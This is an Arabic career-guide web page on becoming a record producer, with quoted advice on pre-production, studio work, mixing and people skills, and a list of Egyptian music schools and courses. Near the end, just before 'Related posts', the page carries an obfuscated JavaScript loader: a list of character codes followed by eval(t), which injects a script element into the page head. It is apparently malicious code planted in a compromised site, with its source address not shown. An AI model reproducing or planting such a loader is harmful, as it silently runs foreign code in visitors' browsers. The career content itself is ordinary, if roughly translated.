منتج التسجيلات

لمحة عامة عن الوظيفة
منتج التسجيلات يقود مراحل إنتاج الموسيقى من خلال تدريب وتوجيه الموسيقيين وتقديم المشورة في مراحل ما قبل الإنتاج بالإضافة إلى إدارة مراحل التسجيل والإنتاج داخل الأستوديو.

كيف تصبح منتج تسجيلات
ما هو عمل منتج التسجيلات؟
“بصفتك منتجًا ، فهذا يعني المشاركة بشكل صحيح في البداية مع الأغاني ، والعمل على هيكل الأغنية ، والعمل على الترتيب ، والعمل على كل ملاحظة من كل جزء ووضع تلك الصورة الكاملة معا ، والدخول في البروفات.
يمكن أن يتم الإنتاج المسبق في الطابق العلوي الخاص بي هنا باستخدام جيتار أو بيانو ، مجرد الجلوس والعزف على الأغنية. هذا هو أفضل شيء: الحصول على الأغنية بشكل صحيح في أولى مراحلها “.
يدرّب منتج التسجيل الفنان ويغني الأغنية ، ويقترح تغييرات لتحسين المسار أثناء مرحلة ما قبل الإنتاج. “في بعض الأحيان يكون هذا هو هيكل الأغنية ، حيث يتم تمديد الشريط بعد الكورس الثاني ، بضع دقات فقط والسماح لها بالتمسك لتعليق التوتر ، لإبقاء المستمع للحظة التي لم يتوقعوها والعودة إليها ،” .
“إنه يزيد من ديناميكية التشويق وتأثير وقت عودة الجوقة أو عندما تنزل إلى البيت. بمجرد الانتهاء من الأجزاء الأساسية ، سنذهب إلى غرفة البروفة ونجرب كل فكرة ، ونجرب كل طبلة تملأ العازف الذي يريد أن يبتكره ، ودع كل موسيقي يجرب ما يريد.
سنقوم بتدوين بنية الأغنية ، وإذا أردنا إجراء تغيير سريع على بنية الأغنية ، فسيستغرق الأمر بضع ثوانٍ في غرفة التدريب ويمكنك القيام بذلك مقابل 15 إلى 20 دولارًا في الساعة.
“في مرحلة ما قبل الإنتاج ، تركت عازف الدرامز يجرب كل تعبئة ، ثم سنختار الأفضل. سنقرر ، “هذا الملء رائع ، بالتأكيد يجب أن يكون موجودًا ولكنه مشغول جدًا في وقت مبكر جدًا ، لذلك دعونا نحفظه.”
دعونا نبني التوتر. دعونا نجعل المقطوعات الموسيقية بسيطة ثم ربما بعد الجسر ، الخروج من الجسر ، هذا هو المكان الذي يمكنك فيه القيام بالملء المجنون المشغول. “الأمر كله يتعلق بالسماح للموسيقيين بالتعبير عن أنفسهم أثناء كل الوقت الذي تقوم فيه بالإرشاد والتصفية.
دور المُنتِج باعتباره الحافز وكوني مثل صورة المرآة للفرقة. عندما تكون لديهم فكرة ، لأخذ فكرتهم وإلقاء الفكرة التالية عليهم مرة أخرى ومعرفة أين يمكنني أخذهم “.
“بالطبع ، ما هو متوقع من منتج التسجيل سيعتمد على الموقف. يقول ، “في بعض الأحيان كنت أعمل مع فنان حيث أتى الفنان للتو وغنى ووضعت كل الترتيبات معًا ، كل المسارات المساندة ، كل ترتيبات الأوتار ، وفعلت كل شيء وفعلت الفنانة ظهروا للتو لغناء أغنيتهم “.
“ما أفضل فعله عندما أعمل مع الفرق الموسيقية هو دفعهم وإطلاعهم على الطريق للقيام بشيء لم يعرفوه حتى أنهم قادرون عليه ، أو لم يكن لديهم هذه الفكرة ، لرمي الفكرة التالية عليهم ومعرفة ما سيعود. يتعلق الأمر بصنع الموسيقى وصنع شيء فريد ومميز “.
“إذا كنت سأشارك وأساعد الفرقة ، فالأمر يتعلق بمساعدة الفرقة على تحقيق شيء أفضل مما يمكنهم تحقيقه بمفردهم ، بدون منتِج.”
“بمجرد أن نكون في الاستوديو ، فإن الأمر يتعلق بالتقاط اللحظة ثم بعد المسارات الأساسية ، يكون الأمر متعلقًا بعمل الدوبس ، والآلات الإضافية – ربما قيثارات إضافية ، أو غناء رئيسي ، أو ربما بعض الأغاني الداعمة أو لوحات المفاتيح أو اللمسات الإضافية هنا أو هناك. لكن الأمر دائمًا يتعلق بالحفاظ على الرؤية أو الحفاظ على المفهوم. الشيء الأكثر أهمية هو أن يكون المفهوم واضحًا للغاية “.
“منذ المرة الأولى التي يجلس فيها فنان معي ويعزف الأغنية على الجيتار أو البيانو ، لدي فكرة عن الأغنية. لدي شكل ومزاج وألوان ومواقف “.
ويضيف: “في بعض الأحيان ، إذا احتجت إلى ذلك ، سأقوم ببعض البرمجة الإضافية على أغنية ، أو بعض الإيقاعات أو أي شيء آخر ، أو سأضيف جزءًا صغيرًا من الجيتار أو جزءًا من المزج”.
يعمل منتجو التسجيلات مع مهندسي التسجيل ، والمهندسين المساعدين ، ومنسقي A&R ، والمديرين التنفيذيين لشركة التسجيلات ، والملحنين ، وموسيقيي الجلسات ، ومغني الجلسات ، والفرق الموسيقية ، والفنانين المنفردين.

• الدراسة الاكاديمية
كلية التربية النوعية – قسم تربية موسيقية – جامعة القاهرة – جامعة أسيوط – جامعة كفر الشيخ – جامعة المنصورة – جامعة عين شمس
كلية التربية الموسيقية – جامعة حلوان
المعهد العالى للموسيقى العربية ( الكونسرفتوار ) – اكاديمية الفنون

• دورات تدريبية
مركز تنمية المواهب – دورات تدريبية – دار الاوبرا المصرية
مركز ” سوناتا ” – دورات تدريبية – لتعليم فنون العزف والغناء
ساقية الصاوى بالزمالك – دورات تدريبية لتعليم الموسيقى
معهد ” القيثارة ” بمصر الجديدة – دورات تدريبية لتعليم الموسيقى
مركز ” ليجاتو ” مصر – دورات تدربيية – لتعليم الموسيقى والفنون
مدرسة صوت الموسيقى بالمقطم – دورات تدريبية – لتعلم العزف والغناء
بيت العود العربى – دورات تدريبية لتعليم الموسيقى
مركز القاهرة للموسيقى بمصر الجديدة – دورات تدريبية لتعليم الموسيقى
مركز فنون لتعليم الموسيقى والرسم بمدينة نصر – دورات تدريبية لتعليم الموسيقى والرسم
مركز ” جاليليو ” للرسم والفنون – دورات تدريبية لتعليم الموسيقى والرسم
مركز ” كودا ” للفنون بالمقطم – دورات تدريبية لتعليم الموسيقى
المركز الثقافى الروسى بالدقى – دورات تدريبية لتعليم الموسيقى
محل ” ديستيجو ” لبيع الالات الموسيقية بالمعادى – دورات تدريبية لتعليم الموسيقى
معرض ” ديسبل ” بالمهندسين – دورات تدريبية لتعليم الموسيقى

ما هي المهارات التي تحتاج إليها؟
من الواضح أن تجربة الاستوديو ضرورية لمنتِج التسجيلات الطموحين ، ولكن أيضًا الغرائز الجيدة ، والقدرة على رعاية الإبداع ، والتعبير عن الأفكار بثقة ، وتصور وتحقيق ما تريد تحقيقه داخل الأغنية.
“منذ المرة الأولى التي أسمع فيها أغنية ، لدي فكرة واضحة جدًا عن كيف يجب أن تبدو الأغنية وشكلها. يمكنني تصور الأغنية. يمكنني رسم أشكال الآلات ، ووجهات نظرهم ، سواء كانت في المقدمة أو متراجعة أو واسعة أو عالية في المزيج.
“لدي مفهوم منذ البداية لذا أعرف إلى أين سأذهب معه ، ولكن ما أريد فعله هو جعل الفرقة تستكشف وتجربة أفكارهم.”
لقد تحدثت مؤخرًا مع Ableton وسألني أحدهم من الجمهور كيف تعرف متى يتم المزج (عند انتهاء الأغنية)؟ ضحك حوالي اثني عشر شخصا. وهم يقولون جميعًا من تحت أنفاسهم ، “أوه أنت لا تعرف أبدًا ، أنت لا تعرف أبدًا”.
“قلت ،” كيف تعرف عندما تدخل السيارة أنك وصلت إلى حيث كنت ذاهب؟ هل تقود سيارتك بلا هدف لمدة ساعتين وفجأة توقف عند رالف وفكر ، “أوه أعتقد أنني كنت سأشتري البقالة؟”
“تركب السيارة وتبدأ رحلة بشكل طبيعي بفكرة إلى أين أنت ذاهب. نفس الشيء مع الأغنية. لديك مفهوم وتتخيل النتيجة النهائية. أنت على اتصال حقًا بما تريده الفرقة وتحتاجه الأغنية وتزيل الأشياء التي لن تعمل وتركز على نقاط القوة في الأغاني “.
“ما هي المكونات المتكاملة؟ ماذا علينا أن نحقق مع الأغنية؟ ما هو المزاج؟ ما هو التأثير العاطفي الذي يجب أن نجده؟ هل هي لجعل الناس يريدون الخروج والقتال أو الخروج والرقص طوال الليل أو الجلوس في زاوية والبكاء أو الوقوع في الحب؟ “
“مهما كان الأمر ، إذا كان هذا هو هدفك من الأغنية ، فعليك تحقيق ذلك. ثم يتعلق الأمر بتجميع القطع معًا ، والتتبع ، والزائدة الدائرية “.
“ثم أجلس لأمزج الأغنية وغالبًا ما أقضي أيامًا في مزيج لمجرد الحصول عليها حقًا ، وللعزف على كل آلة موسيقية ، وللحصول على كل لحظة خاصة بقدر ما يمكن أن تكون لأن هناك سببًا يجعل كل نغمة واحدة هناك ولماذا يتم عزفها في الوقت الحالي ولماذا تبدو النوتة وكأنها مرتبطة بالأدوات الأخرى والصورة الصوتية بأكملها “.
“مرة أخرى ، هذا فقط للحصول على الإنجاز الكامل المطلق للمفهوم من البداية ، والغرض من الأغنية – لتمثيل ذلك ونأمل في التقاط ذلك. لذلك عندما يستمع إليها شخص ما ، فهم يفهمونها “
“بصفتك منتجًا ، فإن الأمر أشبه بكونك مخرجًا سينمائيًا ، وأن يكون لديك مفهوم لما تريد تحقيقه من أداء الأغنية وديناميكيتها وعاطفتها والتأكد من حصولك على فنانيك بأفضل ما يمكنهم في تلك اللحظة.”
فيما يتعلق ببناء الثقة ، يقول موزلي ، “عندما بدأت الإنتاج المشترك وأصبحت منتجًا ، كانت إحدى أكثر الأشياء رعباً هي قول الفرقة” ماذا يجب أن نفعل الآن؟ “ولديها الثقة للتعبير عن فكرتي.
لحسن الحظ ، ما أدركت أنني كنت أفعله طوال تلك السنوات [من الاستماع إلى الموسيقى] هو تدريب غرائزي. محاولة استيعاب وتثقيف نفسك قدر الإمكان وبناء هذا النوع من المكتبات [الموسيقية] وتثقيف غرائزك ، ثم البدء في تجربة أفكار جديدة.
“طالما أنك على اتصال بالأغنية ولديك رؤية واضحة لمفهوم المكان الذي يجب أن تذهب إليه الأغنية ، نأمل أن تكون لديك فكرة وهي غريزية وتستند إلى استجابة عاطفية للفنان أو الموسيقى أو الأغنية.”
“إذا كنت صادقًا وصادقًا ومتواصلًا مع الأغنية بشكل عام ، فإن الفكرة التي سأأتي بها ستكون ذات صلة وتعمل على تطوير الأغنية. ثم إذا أحببت الفرقة ذلك ، فإن ذلك من شأنه أن يولد الثقة في وجود المزيد من الأفكار ، بينما أتذكر دائمًا أنه يجب أن أكون متمركزًا تمامًا ، على اتصال مع الأغنية والفنان ، وفي الوقت الحالي “.
“ما دمت في ذلك المكان ، فإن معظم الأفكار التي سأطرحها ستعمل أو ستطلق الفكرة التالية.”

الشخصية
يمكن للشخصية أن تتفوق على المهارات عندما يتعلق الأمر بمن يريد الفنانون ومهندسو التسجيل ومنتجي التسجيلات الآخرين العمل جنبًا إلى جنب. يصف موزلي السمات الشخصية الرئيسية للمنتِج الطموح بأنها الثقة ، “الصبر ، التصميم المطلق ، واحترام الأشخاص الذين تعمل معهم.
“في البداية ، كنت هادئًا للغاية ، عندما دخلت الاستوديوهات كطاهي وباني ووصلت وحدة التحكم ، كنت أحد الأشخاص الاثني عشر الذين حملوا إطار وحدة التحكم. بدأوا في وضع الوحدات في المكتب وأنا بدأت أفكر ، “ماذا فعلت؟” فكرت ، “لن أفهم أبدًا كيف يعمل أي من هذا.”
“كان يجب أن أبقى في كلية الحقوق. انا ثمل. لن أتعرف أبدًا على كيفية عمل هذا. “أنا لست شخصًا تقنيًا ، لكنني اكتشفت للتو حبًا للصوت وعملية صنع الموسيقى وعرفت للتو أنه يجب أن أكون هناك في هذه البيئة. لقد كانت فترة صعبة للغاية. كنت في ترايدنت لمدة أربع سنوات. قلة قليلة من الناس نجوا كل هذه المدة. لقد كانت عملية صعبة ، لقد أُنهك الكثير من الناس “.
“رأيت شخصين أو ثلاثة ينهارون بمجرد أن أصبحوا مهندسًا بسبب كل الضغوط وألعاب الرأس من قبل Rock Stars. لذلك يجب أن يكون لديك شعور حقيقي بالتركيز. يجب أن تكون لديك القدرة على قراءة الأشخاص وأيضًا معرفة متى تتكيف ، ومتى يجب أن تتقدم وتكون قويًا ومتى تتراجع وتكون غير مرئي “.
القدرة على التواصل والتواصل مع كل فرد في الفريق مهمة أيضًا. يقول: “لابد أنني عملت مع 200 منتج ومهندس مختلف. أعتقد أن هناك خمسة فقط من بين جميع المنتجين الذين عملت معهم لديهم وعي كامل بالصوت وكيفية ربط مفهومهم لجعل المهندس يقوم بإجراء التغييرات التي يريدونها من حيث الترددات ، لإضافة تردد أو طرح تكرر.
“يجب أن يعرف المنتج كيفية الارتباط بفنان ، وكيفية إخراج أداء من فنان ، وكيفية إبقاء الفنان على المسار الصحيح ، وكيفية منع الفنان من الشرب أو القيام بأشياء كثيرة أو متى يسمح للفنان بالحصول على دخان أو شيء ما لأن هذا هو المكان الذي يحتاجون فيه إلى أن يكون الفنان ، في هذا النوع من مساحة الرأس “.
“[يجب أن يعرفوا] كيفية التحدث إلى كل شخص في الفريق ، بما في ذلك العداء ، وبناء فريق يشعر فيه الجميع بأنهم ينتمون إليه ولهم دور ويعملون مع بعضهم البعض.”
“في صناعة الموسيقى ، لا يهم مدى ارتفاعك أو انخفاضك في الترتيب المفترض. في كل مرة أعمل فيها على سجل ، يتعلق الأمر ببناء فريق والحصول على أفضل النتائج من الجميع ، والتحلي بالانضباط ، والتأكد من أن الناس جادون ولا يفسدون ، ولكن أيضًا منح الاحترام عند استحقاقه “.
“إذا كان العداء يقوم بعمل جيد ، فأخبرهم بذلك ، لأنهم إذا قاموا بعمل رائع ، فستكون الجلسة أكثر سلاسة لأن الموسيقيين لديك لا يزعجون أنهم يريدون فنجانًا من الشاي قبل نصف ساعة أو أنهم أراد مشروب غازي وما زال غير موجود “.
“إذا كان العداء يعمل تمامًا ، وإذا كانوا يستمعون إليه في كل مرة هناك شيء ما يحدث وسماعهم” حسنًا ، ربما سنأخذ استراحة في غضون ساعتين “، يعلم العداء أن لديه مجموعة المطبخ فوق أو الصالة أو غرفة الطعام “.
“لذلك عندما يأخذون استراحة ، سيشعرون بالارتياح وسيذهب المنتج” واو ، هذا الرجل يعمل وجلستي تعمل بشكل أكثر سلاسة “لأن الفرقة قد سارت للتو إلى استراحة ، وتم إعداد كل شيء ونحن لن يضيع الوقت الآن بينما يتخبط شخص ما في محاولة لترتيب الغرفة وتنظيف الطاولة.
سيطلب المنتج أو العميل أو الفنان ذلك العداء أو المساعد في المرة القادمة التي يكونون فيها في الاستوديو “.
“عليك أن تكون حازمًا ومركّزًا تمامًا وأن تعمل دائمًا. تقرأ الغرفة. تقرأ الناس. يمكن لأي شخص تعلم البرامج. يمكن لأي شخص تعلم كيفية تشغيل اللوحة “.
“الشيء الصعب هو أن تكون قادرًا على تشغيل اللوحة عندما يكون لديك خمسة أشخاص في الغرفة يطلبون جميعًا أشياء مختلفة في نفس الوقت أو أن شخصًا ما في الفرقة أفسد حقًا أو أن شخصًا ما غاضب حقًا وأنت تحاول أن تظل مركزًا وتحافظ على مركزك وتستمر في كل شيء.
يمكن لأي شخص تعلم البرنامج ؛ ومن الضروري. لكن ما يهم حقًا هو هويتك وقدرتك على قراءة الناس والتفاعل مع الناس.

البداية
“استمع إلى الموسيقى. استمع واستوعبها وحللها. في دورة UCLA Extension الخاصة بي ، أقوم بتمرين. كل شيء عن تأليف الموسيقى يأمل في خلق عاطفة وذلك من خلال كلمات الأغاني وأصوات النغمات والجمع بينها ، سواء كان صوتًا حالمًا أو صوتًا شديد العدوانية “.
“في اللحظة التي تبدأ فيها الموسيقى ، يمنحك صوتها إحساسًا. إنه يغسل عليك أو يضخك ويجعلك سعيدًا. أو يجعلك حزينًا أو حزينًا “.
“في الدورة التدريبية ، يختار الطلاب أغنية يحبونها تمامًا لأنها تخلق نوعًا معينًا من المشاعر وتجعلهم يفحصون الأغنية ، لتجاوز الصوت وكلمات الأغاني والاستماع فعليًا إلى أصوات الملاحظات ومحاولة البحث عن اكتشف ما هو في صوت الأغنية الذي يجعلهم يشعرون بطريقة معينة “.
“هل أن ركلة الطبل عدوانية للغاية أم أنها نوع معين من الفخ؟ هذا النوع من التدريب هو كيف تعلمت. من خلال الاستماع إلى الموسيقى وحبها وتحليل أجزائها ، ورؤية كيف يجمع هذا الفنان أو هذه الفرقة موسيقاهم معًا. إنه تدريب غرائزك ، وتدريب أذنك على استجاباتك. استمع إلى الموسيقى وادفع ثمنها “.

107,39,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(t);

Related posts

مهندس تسجيلات